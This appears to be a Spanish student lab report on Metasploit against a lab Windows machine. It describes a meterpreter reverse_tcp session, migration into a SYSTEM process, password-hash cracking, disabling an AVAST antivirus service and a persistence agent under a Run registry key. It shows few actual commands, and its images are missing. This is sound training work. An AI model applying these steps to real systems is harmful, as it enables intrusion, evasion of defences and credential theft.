Академический Документы
Профессиональный Документы
Культура Документы
METASPLOIT
PRACTICA3
SEGUNDO DE ASIR
Pgina 1
Ahora vamos a utilizar una ataque reverse_tcp el cual nos va a conseguir en principio una sesin meterpreter
Vemos con show options los requerimientos necesarios para la ejecucin de este exploit y si son requeridos.
Entonces ahora lo que hacemos es seleccionar el host local que va a ser el atacante Set lhost 192.168.1.36 Tambin la direccin ip del equipo al que vamos a atacar Set rhost 192.168.1.35
SEGUNDO DE ASIR
Pgina 2
Entonces lo siguiente que hacemos es escibir el comando ps en meterpreter El comando 'ps' muestra una lista de los procesos ejecutandose en el objetivo.
SEGUNDO DE ASIR
Pgina 3
Las dos primeras son muy conocidas por todo aquel que tiene un mediano conocimiento de Windows. La tercera, SYSTEM, es una cuenta a la que normalmente no se tiene acceso, es una cuenta creada por el equipo de Microsoft, como una super cuenta. Esta cuenta equivaldra a una cuenta Administradora de Administradores, como el -su de Linux. Tiene los permisos para hacer lo que sea en el sistema en otras palabras con esta cuenta te vuelves Rey de reyes. Aqu en el ejemplo, he escogido este proceso que cumple los requisitos.
Como vemos al intentar la migracin hacia ese servicio nos deniega el acceso, entonces intentamos otra migracin.
Lo intentamos con el proceso anterior, el cual tambin cumple con los requisitos
SEGUNDO DE ASIR
Pgina 4
SEGUNDO DE ASIR
Pgina 5
Vemos el tiempo que hemos tardado en adivinar admin como contrasea es de 25,34 segundos
SEGUNDO DE ASIR
Pgina 6
El desencriptador online me dice que pasword invlido pero para invlido esta utilidad que esta coja de opciones y de posibilidades y sus resultados son malos por no decir nulos. http://www.hash-cracker.com/index.php#anchor
SEGUNDO DE ASIR
Pgina 7
Vemos que el tiempo en adivinar Asir2012 como contrasea ha sido de 49,31 segundos
SEGUNDO DE ASIR
Pgina 8
Probamos Con GPU BRUTEFORCE y vemos que tampoco puede eso si, nos da un falso positivo
Con SAMInside al cabo de 15 minutos y viendo lo que queda de anlisis lo damos por finalizado como que no ha sacado nada, pero es quiz el que ms posibilidades tiene debido a sus diccionarios.
SEGUNDO DE ASIR
Pgina 9
SEGUNDO DE ASIR
Pgina 10
Entonces probamos, poniendo la contrasea ya desencriptada, pues ya sabamos que era admin y volvemos a probar, como vemos nos da el mismo error lo cual demuestra que no es un error de desencriptacin de la contrasea.
SEGUNDO DE ASIR
Pgina 11
Intentamos la conexin y vemos que las tres veces que nos intentamos identificar, no resulta da resultado
POR QUE NO VAN? Tengo mi teora. Buscamos las caractersticas de estos y vemos que son lo suficiente antiguos para que no se ejecuten en nuestro Windows.
SEGUNDO DE ASIR
Pgina 12
Ejecutamos el siguiente comando y vemos que se ejecuta y se queda detectando un posible antivirus y vuelve a salir a la consola de meterpreter. Entonces lo que hacemos es pensar que a lo mejor por ser un antivirus nuevo y que tiene proteccin ante estos ataques.
Nos vamos al Equipo de la vctima y como podemos apreciar el servicio est iniciado
Pero bueno, no desesperamos, no deja de ser un servicio entonces ejecuto el comando Shell para abrir una consola en el ordenador remoto, el de la vctima
Con el comando net start miro todos los servicios que se estn ejecutando hasta que damos, con el que pertenece a nuestro Antivirus
SEGUNDO DE ASIR
Pgina 13
Como podemos ver nos vamos a las opciones dentro del ordenador de la vctima y no tenemos la opcin de detener el servicio, pese a tener, derechos de Administracin en el sistema.
Sin embargo probamos con AVAST y con un par de simples comandos lo hemos desactivado con lo que en esta batalla de antivirus el ganador Habra sido NOD32 asique procedemos de nuevo a su instalacin ;) .
SEGUNDO DE ASIR
Pgina 14
La nica forma de eliminar el agente es borrar el script que se ha instalado en C: \windows\temp, y la entrada que se ha hecho en el registro HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ con la extensin que vemos
SEGUNDO DE ASIR
Pgina 15
Introducimos el payload correspondiente set payload windows/meterpreter/reverse_tcp Y miramos las opciones pues para acceder al sistema ahora los requisitos han cambiado y como podemos ver requiere de el puerto del proceso.
Entonces se lo indicamos con el comando lport y el nmero del proceso, en este caso seria set lport 444 Si esto fuera una nueva sesin en la que no tuviramos indicada la ip de nuestra victima, lo haramos como en la siguiente imagen.
Y ya solo nos quedara lanzar el exploit y ver como accedemos a una sesin en nuestra vctima y ya tendramos la sesin abierta donde escuchar las conexiones.
SEGUNDO DE ASIR
Pgina 16